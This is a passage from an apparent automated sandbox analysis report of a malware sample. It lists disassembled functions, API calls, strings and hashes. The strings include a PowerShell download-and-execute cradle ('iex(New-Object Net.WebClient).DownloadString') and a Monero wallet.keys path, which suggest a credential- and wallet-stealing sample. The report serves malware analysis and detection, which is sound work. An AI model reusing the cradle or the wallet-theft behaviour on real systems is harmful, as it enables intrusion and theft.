                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: 2f92252cbed8e2a94045a6045426616b97f5ce54a101b6b0d69f7aac5f5e7818
                  • Instruction ID: 2dfd72f8084d367c982c315068f8d92c01be0f92c54c5152505ab58f5c2d4839
                  • Opcode Fuzzy Hash: 2f92252cbed8e2a94045a6045426616b97f5ce54a101b6b0d69f7aac5f5e7818
                  • Instruction Fuzzy Hash: F03193B6910208A7DB10FBB0DCC5EED737CBB58700F404599B31996082EE74A799CF96
                  Function 002B2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 002B2D85
                  Strings
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 002B2CC4
                  • ')", xrefs: 002B2CB3
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 002B2D04
                  • <, xrefs: 002B2D39
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: 21122b978b78c527ae74ef29c70e2baf44b3804e400427afa4e3be7473392a8b
                  • Instruction ID: 727972c371712d9aa2fdd3db4bbd5bab4a08d6268a3ff0d10d36fc5b8b07ddee
                  • Opcode Fuzzy Hash: 21122b978b78c527ae74ef29c70e2baf44b3804e400427afa4e3be7473392a8b
                  • Instruction Fuzzy Hash: 0641BE71C20208AADB18EFA0C8A2FDDB774AF14340F404119E116BA191DF746A5ACF91
                  Function 002A9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                  Download Yara Rule
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 002A9F41
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: 1097e21edfca1ffebd4511f755c398c3f44ff73a46bf2fd6ec3ddcc1505d5c2e
                  • Instruction ID: e1e343fcb729fd35514798f0e82e363e846fb203eff0e138935214cf0aaf6557
                  • Opcode Fuzzy Hash: 1097e21edfca1ffebd4511f755c398c3f44ff73a46bf2fd6ec3ddcc1505d5c2e
                  • Instruction Fuzzy Hash: 57615B31A20248EBDB24EFA4CC96FED77B5AF41340F408518F90A5B191EF746A25CF92
                  Function 002B40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,00D5E2A8,00000000,00020119,?), ref: 002B40F4
                  • RegQueryValueExA.ADVAPI32(?,00D5F1B8,00000000,00000000,00000000,000000FF), ref: 002B4118
                  • RegCloseKey.ADVAPI32(?), ref: 002B4122
                  • lstrcat.KERNEL32(?,00000000), ref: 002B4147
                  • lstrcat.KERNEL32(?,00D5F2A8), ref: 002B415B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValue
                  • String ID:
                  • API String ID: 690832082-0
                  • Opcode ID: 4b65d9d01d810212286bbe378e8979efe8f7a0e6cc0b48dca0732dc437387b68
                  • Instruction ID: dfd6e42853aae2e442e92ffba8b72915527cbbb2d341d46dc3e5e337be2262c8
                  • Opcode Fuzzy Hash: 4b65d9d01d810212286bbe378e8979efe8f7a0e6cc0b48dca0732dc437387b68
                  • Instruction Fuzzy Hash: BC418BB6D101086BDB14FBE0DC86FFD737DAB88300F404559B7155A182EE75ABA88F92
                  Function 002B7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002B7E37
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B7E3E
                  • RegOpenKeyExA.ADVAPI32(80000002,00D4B840,00000000,00020119,?), ref: 002B7E5E
                  • RegQueryValueExA.ADVAPI32(?,00D5E0C8,00000000,00000000,000000FF,000000FF), ref: 002B7E7F
                  • RegCloseKey.ADVAPI32(?), ref: 002B7E92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 2d25018fef6e7e346f5726596f40eb2c0c1100dfd1de26afbd7836a0179889cd
                  • Instruction ID: 9d6c86d899f74a7a047de146f14c76eea887a950477b3f878d7259e9afe1d1bc
                  • Opcode Fuzzy Hash: 2d25018fef6e7e346f5726596f40eb2c0c1100dfd1de26afbd7836a0179889cd
                  • Instruction Fuzzy Hash: EA11A0B1A54245EFD700DF94DD89FBBBBB8FB44B00F104169F605AB281D7B4A8108BA2
                  Function 002B9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                  Download Yara Rule
                  APIs
                  • StrStrA.SHLWAPI(00D5F188,?,?,?,002B140C,?,00D5F188,00000000), ref: 002B926C
                  • lstrcpyn.KERNEL32(004EAB88,00D5F188,00D5F188,?,002B140C,?,00D5F188), ref: 002B9290
                  • lstrlen.KERNEL32(?,?,002B140C,?,00D5F188), ref: 002B92A7
                  • wsprintfA.USER32 ref: 002B92C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: 0fa0bcad93e45f70b279f7d3552ff400f6ed9c64905325ff58482a2ffc385c4f
                  • Instruction ID: baeb3ef09e18b774a8c38e5c22d8ffabdbd26ea401916c484a81281084b3471e
                  • Opcode Fuzzy Hash: 0fa0bcad93e45f70b279f7d3552ff400f6ed9c64905325ff58482a2ffc385c4f
                  • Instruction Fuzzy Hash: 1001C875500148FFCB04DFECC988EAE7BB9EF48355F108258FA099B205C675BA60DB96
                  Function 002A12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002A12B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002A12BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 002A12D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 002A12F5
                  • RegCloseKey.ADVAPI32(?), ref: 002A12FF
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 792885e35e577c37e527addeeb65050b942ae8ef507d4bc5dc0e8508669f9345
                  • Instruction ID: 8e2c7ede48c852b911220f0e15d98d8b92a4954e70efc1cd8d75dc7eb2737e9f
                  • Opcode Fuzzy Hash: 792885e35e577c37e527addeeb65050b942ae8ef507d4bc5dc0e8508669f9345
                  • Instruction Fuzzy Hash: D80136B5A40208BBDB00DFD0DC89FAEB7B8FB48701F008155FA059B281D670AA158F55
                  Function 002BC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: String___crt$Type
                  • String ID:
                  • API String ID: 2109742289-3916222277
                  • Opcode ID: 1487f447a6624a1186626008a81aa4efc5a8d403cef6d2ff3fda71c096a33470
                  • Instruction ID: b3d906b74f64dd0f624259787ff74a83d81623586f444b1da915896011f85a76
                  • Opcode Fuzzy Hash: 1487f447a6624a1186626008a81aa4efc5a8d403cef6d2ff3fda71c096a33470
                  • Instruction Fuzzy Hash: 9C41E871510B9C9FEB228B24CC85FFB7BEC9F45744F2444E8E58A86182E2719A54DF60
                  Function 002B6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 002B6663
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 002B6726
                  • ExitProcess.KERNEL32 ref: 002B6755
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: <
                  • API String ID: 1148417306-4251816714
                  • Opcode ID: 78daa1b299aceed6247396887c052aae5ba0dce36a637a5bd489ff1dfa1f0e93
                  • Instruction ID: 1deb403a698f425693697fb47d260da4e3a76db2f4d7404589605ad29d363fe4
                  • Opcode Fuzzy Hash: 78daa1b299aceed6247396887c052aae5ba0dce36a637a5bd489ff1dfa1f0e93
                  • Instruction Fuzzy Hash: 123127B1C11218AADB14EB90DC92BDEB77CAF04340F804199F31A66192DF746B58CF6A
                  Function 002B87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,002C0E28,00000000,?), ref: 002B882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B8836
                  • wsprintfA.USER32 ref: 002B8850
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: 8cf7365318bbf643cdd4278a1d447a553eb255a99a163a2f0ed781324e676730
                  • Instruction ID: 04d9ae5e4d8147f880aec7086c066a74e9ec81ad5ed1986126f608eb06184a6f
                  • Opcode Fuzzy Hash: 8cf7365318bbf643cdd4278a1d447a553eb255a99a163a2f0ed781324e676730
                  • Instruction Fuzzy Hash: F92145B1E50248AFDB04DFD4DD85FAEBBB8FB49701F104119F505AB281C779A910CBA5
                  Function 002B8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,002B951E,00000000), ref: 002B8D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B8D62
                  • wsprintfW.USER32 ref: 002B8D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
                  • API String ID: 769748085-2783943728
                  • Opcode ID: 8742170988ce6e5af36a1b740b5d1167a4f4b01aa927bc050e2f8a740e060c0b
